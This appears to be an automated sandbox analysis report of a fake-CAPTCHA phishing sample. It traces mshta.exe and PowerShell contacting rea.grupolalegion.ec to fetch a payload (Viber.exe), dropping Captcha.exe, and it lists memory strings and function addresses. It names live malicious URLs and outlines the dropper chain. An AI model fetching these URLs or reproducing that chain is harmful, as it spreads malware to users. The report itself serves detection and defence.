                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 07 Mar 2025 12:21:40 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: powershell.exe, 0000000A.00000002.1871375752.0000000002AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1891559944.0000000007150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                          Source: powershell.exe, 0000000A.00000002.1892100978.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft6
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: Captcha.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: powershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 0000000A.00000002.1872617715.00000000054FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rea.grupolalegion.ec
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.0000000005522000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.10.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: powershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 0000000A.00000002.1872617715.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                          Source: mshta.exe, 00000008.00000003.1758244339.0000000003016000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761955552.0000000003016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: powershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: powershell.exe, 0000000A.00000002.1872617715.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegioH
                          Source: powershell.exe, 0000000A.00000002.1872617715.0000000004B57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872617715.00000000051D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec
                          Source: mshta.exe, 00000008.00000003.1757390190.0000000003041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762227045.0000000003041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/
                          Source: powershell.exe, 0000000A.00000002.1871375752.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1872002161.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, p[1].htm.8.drString found in binary or memory: https://rea.grupolalegion.ec/Viber.exe
                          Source: mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761873050.0000000002FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.php
                          Source: mshta.exe, 00000008.00000003.1761060931.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761873050.0000000002FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.php$1RQ
                          Source: mshta.exe, 00000008.00000003.1757390190.000000000306F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762396893.0000000003070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.php...
                          Source: mshta.exe, 00000008.00000003.1757390190.0000000003041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762227045.0000000003041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.php...ett1
                          Source: mshta.exe, 00000008.00000003.1757390190.000000000306F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762396893.0000000003070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.php?
                          Source: mshta.exe, 00000008.00000003.1761060931.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761873050.0000000002FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpA
                          Source: mshta.exe, 00000008.00000002.1761955552.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpEventindowsINetCookies
                          Source: mshta.exe, 00000008.00000002.1761955552.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpJ
                          Source: mshta.exe, 00000008.00000003.1758360005.000000000696E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1757504976.000000000696B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1768715509.000000000696F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpLMEMH
                          Source: mshta.exe, 00000008.00000002.1762646068.0000000003340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpMBE
                          Source: mshta.exe, 00000008.00000002.1768844911.0000000008A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpU
                          Source: mshta.exe, 00000008.00000002.1761955552.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpW
                          Source: mshta.exe, 00000008.00000002.1761644905.0000000002FB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761294842.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpWinSta0
                          Source: mshta.exe, 00000008.00000003.1759760781.00000000081B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phphttps://rea.grupolalegion.ec/p.php
                          Source: mshta.exe, 00000008.00000002.1761644905.0000000002FB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761294842.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpmshta
                          Source: mshta.exe, 00000008.00000003.1758244339.000000000300E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761955552.000000000300E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpsoft
                          Source: mshta.exe, 00000008.00000002.1761644905.0000000002FB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/p.phpt1S
                          Source: mshta.exe, 00000008.00000003.1757390190.0000000003041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762227045.0000000003041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rea.grupolalegion.ec/r
                          Source: chromecache_74.2.drString found in binary or memory: https://www.cloudflare.com
                          Source: chromecache_74.2.drString found in binary or memory: https://www.cloudflare.com/en-us/website-terms/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                          Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.8:49722 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.8:49723 version: TLS 1.2

                          System Summary

                          barindex
                          Powershell drops PE file
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\Captcha.exeJump to dropped file
                          Source: C:\ProgramData\Captcha.exeProcess Stats: CPU usage > 49%
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00537F50 DuplicateHandle,GetCurrentThreadId,CreateWaitableTimerExW,CreateWaitableTimerExW,NtCreateWaitCompletionPacket,VirtualQuery,12_2_00537F50
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00536700 NtCancelWaitCompletionPacket,SetWaitableTimer,NtAssociateWaitCompletionPacket,12_2_00536700
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183491012_3_01834910
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183E91012_3_0183E910
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184C91012_3_0184C910
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184C11012_3_0184C110
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185E91012_3_0185E910
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185A11012_3_0185A110
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186C11012_3_0186C110
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184D93412_3_0184D934
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183913012_3_01839130
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184313012_3_01843130
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185113012_3_01851130
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186313012_3_01863130
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183F93412_3_0183F934
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183593412_3_01835934
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186B0CB12_3_0186B0CB
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_018590CB12_3_018590CB
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186E8D212_3_0186E8D2
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184602012_3_01846020
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185402012_3_01854020
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186602012_3_01866020
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183A84012_3_0183A840
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184484012_3_01844840
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185284012_3_01852840
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186484012_3_01864840
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186E07712_3_0186E077
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0187238412_3_01872384
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184738012_3_01847380
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185538012_3_01855380
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186738012_3_01867380
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01835B9212_3_01835B92
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183FB9212_3_0183FB92
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184DB9212_3_0184DB92
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185FB9212_3_0185FB92
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01872BAD12_3_01872BAD
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183A29012_3_0183A290
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184429012_3_01844290
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185229012_3_01852290
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186429012_3_01864290
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183F2B012_3_0183F2B0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_018352B012_3_018352B0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184D2B012_3_0184D2B0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185F2B012_3_0185F2B0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01847AD012_3_01847AD0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01855AD012_3_01855AD0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01867AD012_3_01867AD0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01835A2A12_3_01835A2A
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183FA2A12_3_0183FA2A
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184DA2A12_3_0184DA2A
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185FA2A12_3_0185FA2A
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183FA4A12_3_0183FA4A
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01835A4A12_3_01835A4A
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184DA4A12_3_0184DA4A
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185FA4A12_3_0185FA4A
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_018585E012_3_018585E0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186A5E012_3_0186A5E0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186EDEF12_3_0186EDEF
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185B50D12_3_0185B50D
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186D50D12_3_0186D50D
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_018477A012_3_018477A0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_018557A012_3_018557A0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_018677A012_3_018677A0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01847FE012_3_01847FE0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01855FE012_3_01855FE0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01867FE012_3_01867FE0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01833EF012_3_01833EF0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183DEF012_3_0183DEF0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185DEF012_3_0185DEF0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01846E1012_3_01846E10
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01854E1012_3_01854E10
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01866E1012_3_01866E10
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01839E2012_3_01839E20
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183B62012_3_0183B620
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01843E2012_3_01843E20
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184562012_3_01845620
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0185362012_3_01853620
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01851E2012_3_01851E20
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_01863E2012_3_01863E20
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186562012_3_01865620
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0053F80012_2_0053F800
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0050903012_2_00509030
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_005030C012_2_005030C0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0050695012_2_00506950
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0050514612_2_00505146
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0050717012_2_00507170
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00526AF012_2_00526AF0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00552B1012_2_00552B10
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0051330012_2_00513300
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0053B46012_2_0053B460
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00507CC012_2_00507CC0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_005064B012_2_005064B0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00510CB012_2_00510CB0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0050ED4012_2_0050ED40
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00513DD012_2_00513DD0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0050858012_2_00508580
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0056BE5012_2_0056BE50
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0050963012_2_00509630
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0050EE2512_2_0050EE25
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0053168012_2_00531680
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00515F1012_2_00515F10
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_00532F0012_2_00532F00
                          Source: C:\ProgramData\Captcha.exeCode function: 12_2_0051AFA012_2_0051AFA0
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0183F9B112_3_0183F9B1
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_018359B112_3_018359B1
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0184D9B112_3_0184D9B1
                          Source: C:\ProgramData\Captcha.exeCode function: 12_3_0186103012_3_01861030
                          Source: C:\ProgramData\Captcha.exeCode function: String function: 0053C860 appears 376 times
                          Source: C:\ProgramData\Captcha.exeCode function: String function: 0056B620 appears 287 times
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                          Source: classification engineClassification label: mal100.phis.troj.evad.win@27/16@11/5
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_03
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj2rl2sh.mjz.ps1Jump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: Captcha.exeString found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
                          Source: Captcha.exeString found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
                          Source: Captcha.exeString found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
                          Source: Captcha.exeString found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
                          Source: Captcha.exeString found in binary or memory: misrounded allocation in sysAllocruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
                          Source: Captcha.exeString found in binary or memory: misrounded allocation in sysAllocruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
                          Source: Captcha.exeString found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
                          Source: Captcha.exeString found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
                          Source: Captcha.exeString found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
                          Source: Captcha.exeString found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
                          Source: Captcha.exeString found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
                          Source: Captcha.exeString found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
                          Source: Captcha.exeString found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
